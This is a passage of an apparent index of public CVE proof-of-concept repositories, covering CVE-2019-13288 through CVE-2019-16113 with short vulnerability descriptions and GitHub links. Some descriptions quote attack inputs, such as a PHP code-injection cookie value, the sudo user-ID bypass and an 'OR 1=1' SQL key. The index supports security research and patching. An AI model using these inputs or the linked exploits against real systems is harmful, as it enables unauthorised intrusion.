- [gleaming0/CVE-2019-13288](https://github.com/gleaming0/CVE-2019-13288)
- [Fineas/CVE-2019-13288-POC](https://github.com/Fineas/CVE-2019-13288-POC)
### CVE-2019-13292 (2019-07-04)
A SQL Injection issue was discovered in webERP 4.15. Payments.php accepts payment data in base64 format. After this is decoded, it is deserialized. Then, this deserialized data goes directly into a SQL query, with no sanitizing checks.
- [gustanini/CVE-2019-13292-WebERP_4.15](https://github.com/gustanini/CVE-2019-13292-WebERP_4.15)
### CVE-2019-13361 (2019-09-05)
Smanos W100 1.0.0 devices have Insecure Permissions, exploitable by an attacker on the same Wi-Fi network.
- [lodi-g/CVE-2019-13361](https://github.com/lodi-g/CVE-2019-13361)
### CVE-2019-13403 (2019-07-17)
Temenos CWX version 8.9 has an Broken Access Control vulnerability in the module /CWX/Employee/EmployeeEdit2.aspx, leading to the viewing of user information.
- [B3Bo1d/CVE-2019-13403](https://github.com/B3Bo1d/CVE-2019-13403)
### CVE-2019-13404 (2019-07-08)
The MSI installer for Python through 2.7.16 on Windows defaults to the C:\Python27 directory, which makes it easier for local users to deploy Trojan horse code. (This also affects old 3.x releases before 3.5.) NOTE: the vendor's position is that it is the user's responsibility to ensure C:\Python27 access control or choose a different directory, because backwards compatibility requires that C:\Python27 remain the default for 2.7.x
- [alidnf/CVE-2019-13404](https://github.com/alidnf/CVE-2019-13404)
### CVE-2019-13496 (2019-11-04)
One Identity Cloud Access Manager before 8.1.4 Hotfix 1 allows OTP bypass via vectors involving a man in the middle, the One Identity Defender product, and replacing a failed SAML response with a successful SAML response.
- [FurqanKhan1/CVE-2019-13496](https://github.com/FurqanKhan1/CVE-2019-13496)
### CVE-2019-13497 (2019-11-04)
One Identity Cloud Access Manager before 8.1.4 Hotfix 1 allows CSRF for logout requests.
- [FurqanKhan1/CVE-2019-13497](https://github.com/FurqanKhan1/CVE-2019-13497)
### CVE-2019-13498 (2019-07-29)
One Identity Cloud Access Manager 8.1.3 does not use HTTP Strict Transport Security (HSTS), which may allow man-in-the-middle (MITM) attacks. This issue is fixed in version 8.1.4.
- [FurqanKhan1/CVE-2019-13498](https://github.com/FurqanKhan1/CVE-2019-13498)
### CVE-2019-13574 (2019-07-12)
In lib/mini_magick/image.rb in MiniMagick before 4.9.4, a fetched remote image filename could cause remote command execution because Image.open input is directly passed to Kernel#open, which accepts a '|' character followed by a command.
- [masahiro331/CVE-2019-13574](https://github.com/masahiro331/CVE-2019-13574)
### CVE-2019-13633 (2020-10-19)
Blinger.io v.1.0.2519 is vulnerable to Blind/Persistent XSS. An attacker can send arbitrary JavaScript code via a built-in communication channel, such as Telegram, WhatsApp, Viber, Skype, Facebook, Vkontakte, or Odnoklassniki. This is mishandled within the administration panel for conversations/all, conversations/inbox, conversations/unassigned, and conversations/closed.
- [Security-AVS/CVE-2019-13633](https://github.com/Security-AVS/CVE-2019-13633)
### CVE-2019-13720 (2019-11-25)
Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [cve-2019-13720/cve-2019-13720](https://github.com/cve-2019-13720/cve-2019-13720)
- [ChoKyuWon/CVE-2019-13720](https://github.com/ChoKyuWon/CVE-2019-13720)
### CVE-2019-13764 (2019-12-10)
Type confusion in JavaScript in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [HaboobLab/CVE-2019-13764](https://github.com/HaboobLab/CVE-2019-13764)
### CVE-2019-13956 (2019-07-18)
Discuz!ML 3.2 through 3.4 allows remote attackers to execute arbitrary PHP code via a modified language cookie, as demonstrated by changing 4gH4_0df5_language=en to 4gH4_0df5_language=en'.phpinfo().'; (if the random prefix 4gH4_0df5_ were used).
- [rhbb/CVE-2019-13956](https://github.com/rhbb/CVE-2019-13956)
### CVE-2019-13990 (2019-07-26)
initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.
- [epicosy/Quartz-1](https://github.com/epicosy/Quartz-1)
### CVE-2019-14040 (2020-02-07)
Using memory after being freed in qsee due to wrong implementation can lead to unexpected behavior such as execution of unknown code in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, MDM9150, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, MSM8998, QCS605, QM215, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SDX24, SM8150, SXR1130
- [tamirzb/CVE-2019-14040](https://github.com/tamirzb/CVE-2019-14040)
### CVE-2019-14041 (2020-02-07)
During listener modified response processing, a buffer overrun occurs due to lack of buffer size verification when updating message buffer with physical address information in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8953, MSM8996AU, Nicobar, QCM2150, QCS405, QCS605, QM215, Rennell, SA6155P, Saipan, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM670, SDM710, SDM845, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130
- [tamirzb/CVE-2019-14041](https://github.com/tamirzb/CVE-2019-14041)
### CVE-2019-14079 (2020-03-05)
Access to the uninitialized variable when the driver tries to unmap the dma buffer of a request which was never mapped in the first place leading to kernel failure in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8009, APQ8053, MDM9607, MDM9640, MSM8909W, MSM8953, QCA6574AU, QCS605, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM670, SDM710, SDM845, SDX24, SM8150, SXR1130
- [parallelbeings/CVE-2019-14079](https://github.com/parallelbeings/CVE-2019-14079)
### CVE-2019-14220 (2019-09-24)
An issue was discovered in BlueStacks 4.110 and below on macOS and on 4.120 and below on Windows. BlueStacks employs Android running in a virtual machine (VM) to enable Android apps to run on Windows or MacOS. Bug is in a local arbitrary file read through a system service call. The impacted method runs with System admin privilege and if given the file name as parameter returns you the content of file. A malicious app using the affected method can then read the content of any system file which it is not authorized to read
- [seqred-s-a/cve-2019-14220](https://github.com/seqred-s-a/cve-2019-14220)
### CVE-2019-14234 (2019-08-09)
An issue was discovered in Django 1.11.x before 1.11.23, 2.1.x before 2.1.11, and 2.2.x before 2.2.4. Due to an error in shallow key transformation, key and index lookups for django.contrib.postgres.fields.JSONField, and key lookups for django.contrib.postgres.fields.HStoreField, were subject to SQL injection. This could, for example, be exploited via crafted use of "OR 1=1" in a key or index name to return all records, using a suitably crafted dictionary, with dictionary expansion, as the **kwargs passed to the QuerySet.filter() function.
- [malvika-thakur/CVE-2019-14234](https://github.com/malvika-thakur/CVE-2019-14234)
### CVE-2019-14267 (2019-07-29)
PDFResurrect 0.15 has a buffer overflow via a crafted PDF file because data associated with startxref and %%EOF is mishandled.
- [snappyJack/pdfresurrect_CVE-2019-14267](https://github.com/snappyJack/pdfresurrect_CVE-2019-14267)
### CVE-2019-14271 (2019-07-29)
In Docker 19.03.x before 19.03.1 linked against the GNU C Library (aka glibc), code injection can occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the container.
- [iridium-soda/CVE-2019-14271_Exploit](https://github.com/iridium-soda/CVE-2019-14271_Exploit)
### CVE-2019-14287 (2019-10-17)
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
- [FauxFaux/sudo-cve-2019-14287](https://github.com/FauxFaux/sudo-cve-2019-14287)
- [CashWilliams/CVE-2019-14287-demo](https://github.com/CashWilliams/CVE-2019-14287-demo)
- [n0w4n/CVE-2019-14287](https://github.com/n0w4n/CVE-2019-14287)
- [gurneesh/CVE-2019-14287-write-up](https://github.com/gurneesh/CVE-2019-14287-write-up)
- [shallvhack/Sudo-Security-Bypass-CVE-2019-14287](https://github.com/shallvhack/Sudo-Security-Bypass-CVE-2019-14287)
- [huang919/cve-2019-14287-PPT](https://github.com/huang919/cve-2019-14287-PPT)
- [wenyu1999/sudo-](https://github.com/wenyu1999/sudo-)
- [Sindadziy/cve-2019-14287](https://github.com/Sindadziy/cve-2019-14287)
- [Sindayifu/CVE-2019-14287-CVE-2014-6271](https://github.com/Sindayifu/CVE-2019-14287-CVE-2014-6271)
- [CMNatic/Dockerized-CVE-2019-14287](https://github.com/CMNatic/Dockerized-CVE-2019-14287)
- [axax002/sudo-vulnerability-CVE-2019-14287](https://github.com/axax002/sudo-vulnerability-CVE-2019-14287)
- [SachinthaDeSilva-cmd/Exploit-CVE-2019-14287](https://github.com/SachinthaDeSilva-cmd/Exploit-CVE-2019-14287)
- [HussyCool/CVE-2019-14287-IT18030372-](https://github.com/HussyCool/CVE-2019-14287-IT18030372-)
- [ShianTrish/sudo-Security-Bypass-vulnerability-CVE-2019-14287](https://github.com/ShianTrish/sudo-Security-Bypass-vulnerability-CVE-2019-14287)
- [ejlevin99/Sudo-Security-Bypass-Vulnerability](https://github.com/ejlevin99/Sudo-Security-Bypass-Vulnerability)
- [thinuri99/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-](https://github.com/thinuri99/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-)
- [janod313/-CVE-2019-14287-SUDO-bypass-vulnerability](https://github.com/janod313/-CVE-2019-14287-SUDO-bypass-vulnerability)
- [DewmiApsara/CVE-2019-14287](https://github.com/DewmiApsara/CVE-2019-14287)
- [M108Falcon/Sudo-CVE-2019-14287](https://github.com/M108Falcon/Sudo-CVE-2019-14287)
- [edsonjt81/CVE-2019-14287-](https://github.com/edsonjt81/CVE-2019-14287-)
- [DularaAnushka/Linux-Privilege-Escalation-using-Sudo-Rights](https://github.com/DularaAnushka/Linux-Privilege-Escalation-using-Sudo-Rights)
- [h3xcr4ck3r/CVE-2019-14287](https://github.com/h3xcr4ck3r/CVE-2019-14287)
- [Hasintha-98/Sudo-Vulnerability-Exploit-CVE-2019-14287](https://github.com/Hasintha-98/Sudo-Vulnerability-Exploit-CVE-2019-14287)
- [MariliaMeira/CVE-2019-14287](https://github.com/MariliaMeira/CVE-2019-14287)
- [Ijinleife/CVE-2019-14287](https://github.com/Ijinleife/CVE-2019-14287)
- [lemonadern/poc-cve-2019-14287](https://github.com/lemonadern/poc-cve-2019-14287)
### CVE-2019-14314 (2019-08-27)
A SQL injection vulnerability exists in the Imagely NextGEN Gallery plugin before 3.2.11 for WordPress. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system via modules/nextgen_gallery_display/package.module.nextgen_gallery_display.php.
- [imthoe/CVE-2019-14314](https://github.com/imthoe/CVE-2019-14314)
### CVE-2019-14319 (2019-09-04)
The TikTok (formerly Musical.ly) application 12.2.0 for Android and iOS performs unencrypted transmission of images, videos, and likes. This allows an attacker to extract private sensitive information by sniffing network traffic.
- [MelroyB/CVE-2019-14319](https://github.com/MelroyB/CVE-2019-14319)
### CVE-2019-14322 (2019-07-28)
In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.
- [faisalfs10x/CVE-2019-14322-scanner](https://github.com/faisalfs10x/CVE-2019-14322-scanner)
- [faisalfs10x/http-vuln-cve2019-14322.nse](https://github.com/faisalfs10x/http-vuln-cve2019-14322.nse)
- [sergiovks/CVE-2019-14322](https://github.com/sergiovks/CVE-2019-14322)
### CVE-2019-14326 (2020-04-14)
An issue was discovered in AndyOS Andy versions up to 46.11.113. By default, it starts telnet and ssh (ports 22 and 23) with root privileges in the emulated Android system. This can be exploited by remote attackers to gain full access to the device, or by malicious apps installed inside the emulator to perform privilege escalation from a normal user to root (unlike with standard methods of getting root privileges on Android - e.g., the SuperSu program - the user is not asked for consent). There is no authentication performed - access to a root shell is given upon a successful connection. NOTE: although this was originally published with a slightly different CVE ID number, the correct ID for this Andy vulnerability has always been CVE-2019-14326.
- [seqred-s-a/cve-2019-14326](https://github.com/seqred-s-a/cve-2019-14326)
### CVE-2019-14339 (2019-09-05)
The ContentProvider in the Canon PRINT jp.co.canon.bsd.ad.pixmaprint 2.5.5 application for Android does not properly restrict canon.ij.printer.capability.data data access. This allows an attacker's malicious application to obtain sensitive information including factory passwords for the administrator web interface and WPA2-PSK key.
- [0x48piraj/CVE-2019-14339](https://github.com/0x48piraj/CVE-2019-14339)
### CVE-2019-14439 (2019-07-30)
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath.
- [jas502n/CVE-2019-14439](https://github.com/jas502n/CVE-2019-14439)
### CVE-2019-14450 (2019-10-28)
A directory traversal vulnerability was discovered in RepetierServer.exe in Repetier-Server 0.8 through 0.91 that allows for the creation of a user controlled XML file at an unintended location. When this is combined with CVE-2019-14451, an attacker can upload an "external command" configuration as a printer configuration, and achieve remote code execution. After exploitation, loading of the external command configuration is dependent on a system reboot or service restart.
- [securifera/CVE-2019-14450](https://github.com/securifera/CVE-2019-14450)
### CVE-2019-14514 (2020-02-10)
An issue was discovered in Microvirt MEmu all versions prior to 7.0.2. A guest Android operating system inside the MEmu emulator contains a /system/bin/systemd binary that is run with root privileges on startup (this is unrelated to Red Hat's systemd init program, and is a closed-source proprietary tool that seems to be developed by Microvirt). This program opens TCP port 21509, presumably to receive installation-related commands from the host OS. Because everything after the installer:uninstall command is concatenated directly into a system() call, it is possible to execute arbitrary commands by supplying shell metacharacters.
- [seqred-s-a/cve-2019-14514](https://github.com/seqred-s-a/cve-2019-14514)
### CVE-2019-14529 (2019-08-02)
OpenEMR before 5.0.2 allows SQL Injection in interface/forms/eye_mag/save.php.
- [Wezery/CVE-2019-14529](https://github.com/Wezery/CVE-2019-14529)
### CVE-2019-14530 (2019-08-13)
An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
- [Wezery/CVE-2019-14530](https://github.com/Wezery/CVE-2019-14530)
- [sec-it/exploit-CVE-2019-14530](https://github.com/sec-it/exploit-CVE-2019-14530)
### CVE-2019-14537 (2019-08-07)
YOURLS through 1.7.3 is affected by a type juggling vulnerability in the api component that can result in login bypass.
- [Wocanilo/CVE-2019-14537](https://github.com/Wocanilo/CVE-2019-14537)
### CVE-2019-14540 (2019-09-15)
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariConfig.
- [LeadroyaL/cve-2019-14540-exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)
### CVE-2019-14615 (2020-01-17)
Insufficient control flow in certain data structures for some Intel(R) Processors with Intel(R) Processor Graphics may allow an unauthenticated user to potentially enable information disclosure via local access.
- [HE-Wenjian/iGPU-Leak](https://github.com/HE-Wenjian/iGPU-Leak)
### CVE-2019-14678 (2019-11-14)
SAS XML Mapper 9.45 has an XML External Entity (XXE) vulnerability that can be leveraged by malicious attackers in multiple ways. Examples are Local File Reading, Out Of Band File Exfiltration, Server Side Request Forgery, and/or Potential Denial of Service attacks. This vulnerability also affects the XMLV2 LIBNAME engine when the AUTOMAP option is used.
- [mbadanoiu/CVE-2019-14678](https://github.com/mbadanoiu/CVE-2019-14678)
### CVE-2019-14745 (2019-08-07)
In radare2 before 3.7.0, a command injection vulnerability exists in bin_symbols() in libr/core/cbin.c. By using a crafted executable file, it's possible to execute arbitrary shell commands with the permissions of the victim. This vulnerability is due to improper handling of symbol names embedded in executables.
- [xooxo/CVE-2019-14745](https://github.com/xooxo/CVE-2019-14745)
### CVE-2019-14751 (2019-08-22)
NLTK Downloader before 3.4.5 is vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in an NLTK package (ZIP archive) that is mishandled during extraction.
- [mssalvatore/CVE-2019-14751_PoC](https://github.com/mssalvatore/CVE-2019-14751_PoC)
### CVE-2019-14830 (2021-03-19)
A vulnerability was found in Moodle 3.7 to 3.7.1, 3.6 to 3.6.5, 3.5 to 3.5.7 and earlier unsupported versions, where the mobile launch endpoint contained an open redirect in some circumstances, which could result in a user's mobile access token being exposed. (Note: This does not affect sites with a forced URL scheme configured, mobile service disabled, or where the mobile app login method is "via the app").
- [Fr3d-/moodle-token-stealer](https://github.com/Fr3d-/moodle-token-stealer)
### CVE-2019-14900 (2020-07-06)
A flaw was found in Hibernate ORM in versions before 5.3.18, 5.4.18 and 5.5.0.Beta1. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.
- [shanika04/hibernate-orm](https://github.com/shanika04/hibernate-orm)
### CVE-2019-14912 (2019-09-20)
An issue was discovered in PRiSE adAS 1.7.0. The OPENSSO module does not properly check the goto parameter, leading to an open redirect that leaks the session cookie.
- [Wocanilo/adaPwn](https://github.com/Wocanilo/adaPwn)
### CVE-2019-14974 (2019-08-14)
SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS.
- [conan-sudo/CVE-2019-14974-bypass](https://github.com/conan-sudo/CVE-2019-14974-bypass)
### CVE-2019-15029 (2019-09-05)
FusionPBX 4.4.8 allows an attacker to execute arbitrary system commands by submitting a malicious command to the service_edit.php file (which will insert the malicious command into the database). To trigger the command, one needs to call the services.php file via a GET request with the service id followed by the parameter a=start to execute the stored command.
- [mhaskar/CVE-2019-15029](https://github.com/mhaskar/CVE-2019-15029)
### CVE-2019-15043 (2019-09-03)
In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
- [h0ffayyy/CVE-2019-15043](https://github.com/h0ffayyy/CVE-2019-15043)
### CVE-2019-15053 (2019-08-14)
The "HTML Include and replace macro" plugin before 1.5.0 for Confluence Server allows a bypass of the includeScripts=false XSS protection mechanism via vectors involving an IFRAME element.
- [l0nax/CVE-2019-15053](https://github.com/l0nax/CVE-2019-15053)
### CVE-2019-15107 (2019-08-16)
An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.
- [jas502n/CVE-2019-15107](https://github.com/jas502n/CVE-2019-15107)
- [HACHp1/webmin_docker_and_exp](https://github.com/HACHp1/webmin_docker_and_exp)
- [ketlerd/CVE-2019-15107](https://github.com/ketlerd/CVE-2019-15107)
- [AdministratorGithub/CVE-2019-15107](https://github.com/AdministratorGithub/CVE-2019-15107)
- [Rayferrufino/Make-and-Break](https://github.com/Rayferrufino/Make-and-Break)
- [AleWong/WebminRCE-EXP-CVE-2019-15107-](https://github.com/AleWong/WebminRCE-EXP-CVE-2019-15107-)
- [ianxtianxt/CVE-2019-15107](https://github.com/ianxtianxt/CVE-2019-15107)
- [hannob/webminex](https://github.com/hannob/webminex)
- [ChakoMoonFish/webmin_CVE-2019-15107](https://github.com/ChakoMoonFish/webmin_CVE-2019-15107)
- [cdedmondson/Modified-CVE-2019-15107](https://github.com/cdedmondson/Modified-CVE-2019-15107)
- [ruthvikvegunta/CVE-2019-15107](https://github.com/ruthvikvegunta/CVE-2019-15107)
- [n0obit4/Webmin_1.890-POC](https://github.com/n0obit4/Webmin_1.890-POC)
- [squid22/Webmin_CVE-2019-15107](https://github.com/squid22/Webmin_CVE-2019-15107)
- [MuirlandOracle/CVE-2019-15107](https://github.com/MuirlandOracle/CVE-2019-15107)
- [diegojuan/CVE-2019-15107](https://github.com/diegojuan/CVE-2019-15107)
- [whokilleddb/CVE-2019-15107](https://github.com/whokilleddb/CVE-2019-15107)
- [darrenmartyn/CVE-2019-15107](https://github.com/darrenmartyn/CVE-2019-15107)
- [hacknotes/CVE-2019-15107-Exploit](https://github.com/hacknotes/CVE-2019-15107-Exploit)
- [CyberTuz/CVE-2019-15107_detection](https://github.com/CyberTuz/CVE-2019-15107_detection)
- [hadrian3689/webmin_1.920](https://github.com/hadrian3689/webmin_1.920)
- [f0rkr/CVE-2019-15107](https://github.com/f0rkr/CVE-2019-15107)
- [psw01/CVE-2019-15107_webminRCE](https://github.com/psw01/CVE-2019-15107_webminRCE)
- [lolminerxmrig/CVE-2019-15107](https://github.com/lolminerxmrig/CVE-2019-15107)
- [TheAlpha19/MiniExploit](https://github.com/TheAlpha19/MiniExploit)
- [wenruoya/CVE-2019-15107](https://github.com/wenruoya/CVE-2019-15107)
- [g1vi/CVE-2019-15107](https://github.com/g1vi/CVE-2019-15107)
- [K3ysTr0K3R/CVE-2019-15107-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2019-15107-EXPLOIT)
- [gozn/detect-CVE-2019-15107-by-pyshark](https://github.com/gozn/detect-CVE-2019-15107-by-pyshark)
- [h4ck0rman/CVE-2019-15107](https://github.com/h4ck0rman/CVE-2019-15107)
- [olingo99/CVE-2019-15107](https://github.com/olingo99/CVE-2019-15107)
- [aamfrk/Webmin-CVE-2019-15107](https://github.com/aamfrk/Webmin-CVE-2019-15107)
- [0x4r2/Webmin-CVE-2019-15107](https://github.com/0x4r2/Webmin-CVE-2019-15107)
- [NasrallahBaadi/CVE-2019-15107](https://github.com/NasrallahBaadi/CVE-2019-15107)
- [grayorwhite/CVE-2019-15107](https://github.com/grayorwhite/CVE-2019-15107)
### CVE-2019-15120 (2019-08-16)
The Kunena extension before 5.1.14 for Joomla! allows XSS via BBCode.
- [h3llraiser/CVE-2019-15120](https://github.com/h3llraiser/CVE-2019-15120)
### CVE-2019-15126 (2020-02-05)
An issue was discovered on Broadcom Wi-Fi client devices. Specifically timed and handcrafted traffic can cause internal errors (related to state transitions) in a WLAN device that lead to improper layer 2 Wi-Fi encryption with a consequent possibility of information disclosure over the air for a discrete set of traffic, a different vulnerability than CVE-2019-9500, CVE-2019-9501, CVE-2019-9502, and CVE-2019-9503.
- [0x13enny/kr00k](https://github.com/0x13enny/kr00k)
- [hexway/r00kie-kr00kie](https://github.com/hexway/r00kie-kr00kie)
- [akabe1/kr00ker](https://github.com/akabe1/kr00ker)
### CVE-2019-15166 (2019-10-03)
lmp_print_data_link_subobjs() in print-lmp.c in tcpdump before 4.9.3 lacks certain bounds checks.
- [Satheesh575555/external_tcpdump_AOSP10_r33_CVE-2019-15166](https://github.com/Satheesh575555/external_tcpdump_AOSP10_r33_CVE-2019-15166)
### CVE-2019-15224 (2019-08-19)
The rest-client gem 1.6.10 through 1.6.13 for Ruby, as distributed on RubyGems.org, included a code-execution backdoor inserted by a third party. Versions <=1.6.9 and >=1.6.14 are unaffected.
- [chef-cft/inspec_cve_2019_15224](https://github.com/chef-cft/inspec_cve_2019_15224)
### CVE-2019-15231
- [wizardy0ga/THM-Source-CVE-2019-15231](https://github.com/wizardy0ga/THM-Source-CVE-2019-15231)
### CVE-2019-15233 (2019-08-20)
The Live:Text Box macro in the Old Street Live Input Macros app before 2.11 for Confluence has XSS, leading to theft of the Administrator Session Cookie.
- [l0nax/CVE-2019-15233](https://github.com/l0nax/CVE-2019-15233)
### CVE-2019-15477 (2019-08-23)
Jooby before 1.6.4 has XSS via the default error handler.
- [epicosy/jooby](https://github.com/epicosy/jooby)
### CVE-2019-15511 (2019-11-21)
An exploitable local privilege escalation vulnerability exists in the GalaxyClientService installed by GOG Galaxy. Due to Improper Access Control, an attacker can send unauthenticated local TCP packets to the service to gain SYSTEM privileges in Windows system where GOG Galaxy software is installed. All GOG Galaxy versions before 1.2.60 and all corresponding versions of GOG Galaxy 2.0 Beta are affected.
- [adenkiewicz/CVE-2019-15511](https://github.com/adenkiewicz/CVE-2019-15511)
### CVE-2019-15514 (2019-08-23)
The Privacy > Phone Number feature in the Telegram app 5.10 for Android and iOS provides an incorrect indication that the access level is Nobody, because attackers can find these numbers via the Group Info feature, e.g., by adding a significant fraction of a region's assigned phone numbers.
- [bibi1959/CVE-2019-15514](https://github.com/bibi1959/CVE-2019-15514)
### CVE-2019-15588 (2019-11-01)
There is an OS Command Injection in Nexus Repository Manager <= 2.14.14 (bypass CVE-2019-5475) that could allow an attacker a Remote Code Execution (RCE). All instances using CommandLineExecutor.java with user-supplied data is vulnerable, such as the Yum Configuration Capability.
- [EXP-Docs/CVE-2019-15588](https://github.com/EXP-Docs/CVE-2019-15588)
### CVE-2019-15605 (2020-02-07)
HTTP request smuggling in Node.js 10, 12, and 13 causes malicious payload delivery when transfer-encoding is malformed
- [jlcarruda/node-poc-http-smuggling](https://github.com/jlcarruda/node-poc-http-smuggling)
### CVE-2019-15642 (2019-08-26)
rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."
- [jas502n/CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642)
### CVE-2019-15813 (2019-09-04)
Multiple file upload restriction bypass vulnerabilities in Sentrifugo 3.2 could allow authenticated users to execute arbitrary code via a webshell.
- [wolf1892/CVE-2019-15813](https://github.com/wolf1892/CVE-2019-15813)
### CVE-2019-15846 (2019-09-06)
Exim before 4.92.2 allows remote attackers to execute arbitrary code as root via a trailing backslash.
- [synacktiv/Exim-CVE-2019-15846](https://github.com/synacktiv/Exim-CVE-2019-15846)
### CVE-2019-15858 (2019-09-03)
admin/includes/class.import.snippet.php in the "Woody ad snippets" plugin before 2.2.5 for WordPress allows unauthenticated options import, as demonstrated by storing an XSS payload for remote code execution.
- [GeneralEG/CVE-2019-15858](https://github.com/GeneralEG/CVE-2019-15858)
- [orangmuda/CVE-2019-15858](https://github.com/orangmuda/CVE-2019-15858)
### CVE-2019-15896 (2019-09-10)
An issue was discovered in the LifterLMS plugin through 3.34.5 for WordPress. The upload_import function in the class.llms.admin.import.php script is prone to an unauthenticated options import vulnerability that could lead to privilege escalation (administrator account creation), website redirection, and stored XSS.
- [RandomRobbieBF/CVE-2019-15896](https://github.com/RandomRobbieBF/CVE-2019-15896)
### CVE-2019-15972 (2019-11-26)
A vulnerability in the web-based management interface of Cisco Unified Communications Manager could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability exists because the web-based management interface improperly validates SQL values. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to modify values on or return values from the underlying database.
- [FSecureLABS/Cisco-UCM-SQLi-Scripts](https://github.com/FSecureLABS/Cisco-UCM-SQLi-Scripts)
### CVE-2019-16097 (2019-09-08)
core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.
- [evilAdan0s/CVE-2019-16097](https://github.com/evilAdan0s/CVE-2019-16097)
- [rockmelodies/CVE-2019-16097-batch](https://github.com/rockmelodies/CVE-2019-16097-batch)
- [ianxtianxt/CVE-2019-16097](https://github.com/ianxtianxt/CVE-2019-16097)
- [dacade/cve-2019-16097](https://github.com/dacade/cve-2019-16097)
- [theLSA/harbor-give-me-admin](https://github.com/theLSA/harbor-give-me-admin)
- [luckybool1020/CVE-2019-16097](https://github.com/luckybool1020/CVE-2019-16097)
### CVE-2019-16098 (2019-09-11)
The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code.
- [Barakat/CVE-2019-16098](https://github.com/Barakat/CVE-2019-16098)
- [0xDivyanshu-new/CVE-2019-16098](https://github.com/0xDivyanshu-new/CVE-2019-16098)
- [Offensive-Panda/NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE](https://github.com/Offensive-Panda/NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE)
### CVE-2019-16113 (2019-09-08)
Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.
- [ynots0ups/CVE-2019-16113](https://github.com/ynots0ups/CVE-2019-16113)
- [cybervaca/CVE-2019-16113](https://github.com/cybervaca/CVE-2019-16113)
- [hg8/CVE-2019-16113-PoC](https://github.com/hg8/CVE-2019-16113-PoC)
- [Kenun99/CVE-2019-16113-Dockerfile](https://github.com/Kenun99/CVE-2019-16113-Dockerfile)
- [dldygnl/CVE-2019-16113](https://github.com/dldygnl/CVE-2019-16113)
- [0xConstant/CVE-2019-16113](https://github.com/0xConstant/CVE-2019-16113)
- [DXY0411/CVE-2019-16113](https://github.com/DXY0411/CVE-2019-16113)
- [0xConstant/CVE-2019-16113_](https://github.com/0xConstant/CVE-2019-16113_)
- [mind2hex/CVE-2019-16113](https://github.com/mind2hex/CVE-2019-16113)
